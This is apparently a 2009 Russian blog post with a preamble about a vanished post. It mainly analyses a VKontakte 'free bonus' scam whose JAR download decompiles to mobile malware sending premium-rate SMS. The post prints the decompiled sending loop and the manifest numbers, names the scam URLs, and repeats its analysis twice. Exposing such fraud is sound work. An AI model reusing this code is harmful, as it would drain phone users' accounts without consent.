Как-то незаметно последние пару недель стал просматривать заголовки на хабре, и вдруг неожиданно наткнулся на пост о том, что можно получить инвайт написав пост в «песочницу». Посмотрев что же есть в этой самой «песочнице» и вдохновленный 2.5 л Bagbier, купленном чтобы поностальгировать по молодости, налабал небольшую заметку (текст ниже). Так как времени было уже почти 3 часа ночи, собрался наконец ложиться спать. Но вдруг, обновив страничку с моим постом, увидел странное сообщение «Страница не найдена (404-я ошибка)». Между тем, в почте обнаружился инвайт. Забив на причины 404 и обрадовавшись инвайту я полез регистрироваться. Каково же было мое удивление, когда я увидел что логин уже занят. Далее все было просто — ссылка для восстановления пароля на емэйл и логин на сайт. Оказывается, я здесь регистрировался аж в июле, только напрочь забыл об этом. Остаются непонятными два вопроса, каким образом мне пришел инвайт (связано ли это с моим постом или нет) и куда собственно пропал тот самый пост. )
Далее тот самый исчезнувший текст, а я в недоумении отправляюсь баиньки:
Как было написано в P.P.S. этого топика про спам вконтакте (который, между прочим, некоторые приняли за фэйк), «Пока писал пост, поступила, непроверенная пока, информация о том, что вирус снимает со счета 600 рублей.»
Меня всегда удивляла подобная «непроверенная информация», поскольку уж очень она напоминает «непроверенную информацию» вида «отправь смс на короткий номер и получи 600 р нахаляву», только наоборот. Итак, давайте разберемся, что же все-таки случится с бедолагой, который захочет получить вожделенный денежный бонус нахаляву?
Проследим за его действиями, хотя повторять их в точности конечно не будем:
1. Заходим на упомянутый в топике url http://vkpresents.ru/и нажимаем кнопку «Вход». Да, действительно, не так уж и плохо, «Ваш бонус на данный момент составляет 500 рублей»!
2. Что ж, для получения бонуса надо скачать jar-ку по адресу http://bonus.vkpresents.ru/yes/go.php?id=1. Качаем.
3. Самое интересное — что же делает эта загадочная jar-ка? Для начала давайте ее распакуем: содержимое сразу порадовало — файлик ico.png, директория META-INF (стандартная для jar) и файлик HotSex.class (!)
Собственно в этом горячем файлике и заключается вся магия. Как известно, программы на Java транслируются в байт-код, выполняемый виртуальной java-машиной, следовательно этот байт-код должно быть достаточно легко декомпилировать и восстановить изначальный Java-код. Воспользуемся Java-decompiler-ом, например jad или jd-gui.
Итак, вот как на самом деле выглядит бесплатный сыр:
Очевидно, этот код несколько раз пытается отправить смски на разные номера, и по умолчанию выбран 1171. Посмотрим что еще есть в META-INF/MANIFEST.MF, куда код обращается с помощью getAppProperty():
Вот они те самые номера, куда зловредная программка пытается отправить смс :) Первый же результат запроса смс на номер 1171 в гугле выдает ссылку на обсуждение жуликов, которые предлагают отправить бесплатное смс, за которое в итоге снимают 5 у.е. Итак, если учесть что попыток отправить смс делается в коде всего 8 и за каждое смс снимают по 5 у.е. — в итоге получаем достаточно внушительную сумму в 40 у.е., которая будет списана со счета если все смс получится успешно отправить. По поводу точной суммы, к счастью, не знаю, но упомянутые 600 рублей — это видимо среднее значение :)
Итак, подведем итоги. Разводка конечно же очень слабая, по крайней мере думаю ни один хабрачеловек на такое не поведется, да и вообще 2009-й год на дворе, пора придумывать что-то пооригинальнее :) Тем не менее, порадовало название класса HotSex.class, видимо эта jar-ка была взята из другой разводки, где предлагалось нахаляву посмотреть порнушку :)
Далее тот самый исчезнувший текст, а я в недоумении отправляюсь баиньки:
Как было написано в P.P.S. этого топика про спам вконтакте (который, между прочим, некоторые приняли за фэйк), «Пока писал пост, поступила, непроверенная пока, информация о том, что вирус снимает со счета 600 рублей.»
Меня всегда удивляла подобная «непроверенная информация», поскольку уж очень она напоминает «непроверенную информацию» вида «отправь смс на короткий номер и получи 600 р нахаляву», только наоборот. Итак, давайте разберемся, что же все-таки случится с бедолагой, который захочет получить вожделенный денежный бонус нахаляву?
Проследим за его действиями, хотя повторять их в точности конечно не будем:
1. Заходим на упомянутый в топике url http://vkpresents.ru/и нажимаем кнопку «Вход». Да, действительно, не так уж и плохо, «Ваш бонус на данный момент составляет 500 рублей»!
2. Что ж, для получения бонуса надо скачать jar-ку по адресу http://bonus.vkpresents.ru/yes/go.php?id=1. Качаем.
3. Самое интересное — что же делает эта загадочная jar-ка? Для начала давайте ее распакуем: содержимое сразу порадовало — файлик ico.png, директория META-INF (стандартная для jar) и файлик HotSex.class (!)
Собственно в этом горячем файлике и заключается вся магия. Как известно, программы на Java транслируются в байт-код, выполняемый виртуальной java-машиной, следовательно этот байт-код должно быть достаточно легко декомпилировать и восстановить изначальный Java-код. Воспользуемся Java-decompiler-ом, например jad или jd-gui.
Итак, вот как на самом деле выглядит бесплатный сыр:
public void startApp() {
String number;
MessageConnection messageconnection;
TextMessage textmessage;
for (int i = 0; i < 3; ) {
try {
number = "sms://1171";
if (i == 0)
number = "sms://" + getAppProperty("a");
if (i == 1)
number = "sms://" + getAppProperty("b");
if (i == 2)
number = "sms://" + getAppProperty("e");
messageconnection = (MessageConnection)Connector.open(number);
textmessage = (TextMessage)messageconnection.newMessage("text");
textmessage.setPayloadText("" + getAppProperty("kis"));
messageconnection.send(textmessage);
}
catch (Exception exception)
{
}
++i;
}
...
Очевидно, этот код несколько раз пытается отправить смски на разные номера, и по умолчанию выбран 1171. Посмотрим что еще есть в META-INF/MANIFEST.MF, куда код обращается с помощью getAppProperty():
kis: fasax 1340
wix: xasex 1340
a: 1171
b: 1161
c: 9099
d: 9099
e: 1161
Вот они те самые номера, куда зловредная программка пытается отправить смс :) Первый же результат запроса смс на номер 1171 в гугле выдает ссылку на обсуждение жуликов, которые предлагают отправить бесплатное смс, за которое в итоге снимают 5 у.е. Итак, если учесть что попыток отправить смс делается в коде всего 8 и за каждое смс снимают по 5 у.е. — в итоге получаем достаточно внушительную сумму в 40 у.е., которая будет списана со счета если все смс получится успешно отправить. По поводу точной суммы, к счастью, не знаю, но упомянутые 600 рублей — это видимо среднее значение :)
Итак, подведем итоги. Разводка конечно же очень слабая, по крайней мере думаю ни один хабрачеловек на такое не поведется, да и вообще 2009-й год на дворе, пора придумывать что-то пооригинальнее :) Тем не менее, порадовало название класса HotSex.class, видимо эта jar-ка была взята из другой разводки, где предлагалось нахаляву посмотреть порнушку :)